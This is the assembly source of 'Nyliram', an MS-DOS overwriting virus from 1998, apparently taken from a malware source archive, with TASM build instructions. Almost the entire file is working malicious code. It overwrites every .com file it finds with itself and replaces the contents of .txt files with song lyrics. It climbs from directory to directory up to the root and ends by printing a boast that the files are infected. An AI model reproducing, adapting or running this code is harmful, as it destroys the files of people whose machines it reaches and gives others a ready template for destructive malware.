vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.nyliram.asm

; ------------------------------------------------------------------------- ;
;          Nyliram v1.0 coded by KilJaeden of The Codebreakers 1998         ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm nyliram.asm                                           ;
; to link :::::] tlink /t nyliram.obj                                       ;
; --------------------------------------------------------------------------;

code    segment                         ; segment named code
        assume  cs:code,ds:code         ; assign cs and ds to code
        org     100h                    ; .com file 100 hex
main    proc    near                    ; main procedure near

first_com:
        mov     ah,4eh                  ; find the first file

find_first_com:
        xor     cx,cx                   ; cx to 0
        lea     dx,comfile              ; load *.com into dx
        int     21h                     ; make it so DOS!
        jc      first_txt               ; if no .com found, find .txt

open_com:
        mov     ax,3d02h                ; open file with read/write
        mov     dx,9eh                  ; get file name from DTA (80+1e)
        int     21h                     ; make it so DOS!

infect_com:
        xchg    bx,ax                   ; move file info from ax to bx
        mov     ah,40h                  ; write to file
        mov     cx,offset finish - offset first_com ; replace with
        lea     dx,first_com            ; load effective address
        int     21h                     ; make it so DOS!

close_com:
        mov     ah,3eh                  ; close the file
        int     21h                     ; make it so DOS!
        mov     ah,4fh                  ; find next file
        jmp     find_first_com          ; jump to find_first_com

first_txt:
        mov     ah,4eh                  ; find first file

find_first_txt:
        xor     cx,cx                   ; cx to 0
        lea     dx,txtfile              ; load effective address *.txt
        int     21h                     ; make it so DOS!
        jc      next_dir                ; if none found, leave

open_txt:
        mov     ax,3d02h                ; open file with read/write
        mov     dx,9eh                  ; get file name info
        int     21h                     ; make it so DOS!

infect_txt:
        xchg    bx,ax                   ; put file info into bx
        mov     ah,40h                  ; write to file
        mov     cx,offset pload_finish - offset pload_start ; replace with
        lea     dx,pload_start          ; load effective address
        int     21h                     ; make it so DOS!

close_txt:
        mov     ah,3eh                  ; close up the file
        int     21h                     ; make it so DOS!
        mov     ah,4fh                  ; find next file
        jmp     find_first_txt          ; jump to start again

next_dir:
        lea     dx,dotdot               ; load .. into dx
        mov     ah,3bh                  ; the int for changing directories
        int     21h                     ; make it so!
        jnc     first_com               ; jump to first com, start again!

end_virus:
        mov     ah,09h                  ; print a message
        mov     dx,offset done          ; the message
        int     21h                     ; make it so DOS!
        int     20h                     ; end the program

pload_start:
db      'There''s not much left to love',10             ; payload in txt
db      'Too tired today to hate',10                    ; payload in txt
db      'I feel the minute of decay',10                 ; payload in txt
db      'I''m on my way down now',10                    ; payload in txt
db      'I''d like to take you with me',10              ; payload in txt
db      'I''m on my way down...',10                     ; payload in txt
db      'I''m on my way down now',10                    ; payload in txt
db      'I''d like to take you with me',10              ; payload in txt
db      'I''m on my way down now',10                    ; payload in txt
db      'The minute that it''s born',10                 ; payload in txt
db      'It begins to die',10                           ; payload in txt
db      'I''d love to just give in',10                  ; payload in txt
db      'I''d love to live this lie',10                 ; payload in txt
db      'I''ve been to black and back',10               ; payload in txt
db      'I''ve whited out my name',10                   ; payload in txt
db      'A lack of pain, a lack of hope',10             ; payload in txt
db      'A lack of anything to say',10                  ; payload in txt
db      'There is no cure for what is killing me',10    ; payload in txt
db      'I''m on my way down',10                        ; payload in txt
db      'I''ve looked ahead and saw',10                 ; payload in txt
db      'A world that''s dead',10                       ; payload in txt
db      'I guess that I am too',10                      ; payload in txt
db      ' ',10                                          ; payload in txt
db      'I''m On My Way Down Now',10                    ; payload in txt
pload_finish    label   near                            ; the end label

data_area:
dotdot  db      "..",0
comfile db      "*.com",0
txtfile db      "*.txt",0
done    db      '                                                           ',10,13
        db      '***********************************************************',10,13
        db      'You have infected all .com .txt files from this directory  ',10,13
        db      'to the root directory with the Nyliram virus, written by:  ',10,13
        db      '             KilJaeden of the Codebreakers ''98            ',10,13
        db      '***********************************************************',10,13,'$'

finish  label   near
main    endp
code    ends
end     first_com